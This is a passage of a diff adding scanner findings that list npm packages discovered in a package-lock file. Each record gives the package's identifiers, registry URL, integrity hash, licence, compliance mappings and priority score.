"source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thirty_two:thirty-two:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thirty_two:thirty_two:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thirty:thirty-two:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:thirty:thirty_two:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/thirty-two@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz", + "integrity": "sha512-OEI0IWCe+Dw46019YLl6V10Us5bi574EvlJEOcAkB29IzQ/mYD1A6RyNHLjZPiHCmuodxvgF6U+vZO1L15lxVA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ed31df7df590fd3e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: tiny-inflate 1.0.3", + "title": "tiny-inflate 1.0.3", + "description": "Package discovered: tiny-inflate 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8a9f89a30def4776", + "name": "tiny-inflate", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:tiny-inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny-inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny_inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny_inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny:tiny-inflate:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny:tiny_inflate:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/tiny-inflate@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz", + "integrity": "sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "99c39b0d16665208", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: tiny-invariant 1.3.3", + "title": "tiny-invariant 1.3.3", + "description": "Package discovered: tiny-invariant 1.3.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "509a74e9f8ec9c11", + "name": "tiny-invariant", + "version": "1.3.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:tiny-invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny-invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny_invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny_invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny:tiny-invariant:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:tiny:tiny_invariant:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/tiny-invariant@1.3.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz", + "integrity": "sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e99ae3502724aa2b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: tinyglobby 0.2.16", + "title": "tinyglobby 0.2.16", + "description": "Package discovered: tinyglobby 0.2.16", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ea1b10e091012c4d", + "name": "tinyglobby", + "version": "0.2.16", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:tinyglobby:tinyglobby:0.2.16:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/tinyglobby@0.2.16", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz", + "integrity": "sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==", + "dependencies": { + "fdir": "^6.5.0", + "picomatch": "^4.0.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "098e9c86e46e996b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: to-regex-range 5.0.1", + "title": "to-regex-range 5.0.1", + "description": "Package discovered: to-regex-range 5.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "32aacf96124c437a", + "name": "to-regex-range", + "version": "5.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:to-regex-range:to-regex-range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to-regex-range:to_regex_range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to_regex_range:to-regex-range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to_regex_range:to_regex_range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to-regex:to-regex-range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to-regex:to_regex_range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to_regex:to-regex-range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to_regex:to_regex_range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to:to-regex-range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:to:to_regex_range:5.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/to-regex-range@5.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dependencies": { + "is-number": "^7.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "eba377c5cfb24e56", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: toidentifier 1.0.1", + "title": "toidentifier 1.0.1", + "description": "Package discovered: toidentifier 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ce376bb248c7ffa1", + "name": "toidentifier", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:toidentifier:toidentifier:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/toidentifier@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", + "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "332c86a1be157c00", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: tr46 0.0.3", + "title": "tr46 0.0.3", + "description": "Package discovered: tr46 0.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "44b5fbfc3cffc498", + "name": "tr46", + "version": "0.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:tr46:tr46:0.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/tr46@0.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "975e90d4d26bc8ab", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ts-interface-checker 0.1.13", + "title": "ts-interface-checker 0.1.13", + "description": "Package discovered: ts-interface-checker 0.1.13", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4b85ef460bf1550e", + "name": "ts-interface-checker", + "version": "0.1.13", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ts-interface-checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts-interface-checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts_interface_checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts_interface_checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts-interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts-interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts_interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts_interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts:ts-interface-checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ts:ts_interface_checker:0.1.13:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ts-interface-checker@0.1.13", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ts-interface-checker/-/ts-interface-checker-0.1.13.tgz", + "integrity": "sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ef69db02aad9ddba", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: tslib 2.4.1", + "title": "tslib 2.4.1", + "description": "Package discovered: tslib 2.4.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a41a6d4fcfaa1c57", + "name": "tslib", + "version": "2.4.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "0BSD", + "spdxExpression": "0BSD", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:tslib:tslib:2.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/tslib@2.4.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", + "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==", + "dependencies": null + } + }, + "compliance": { + 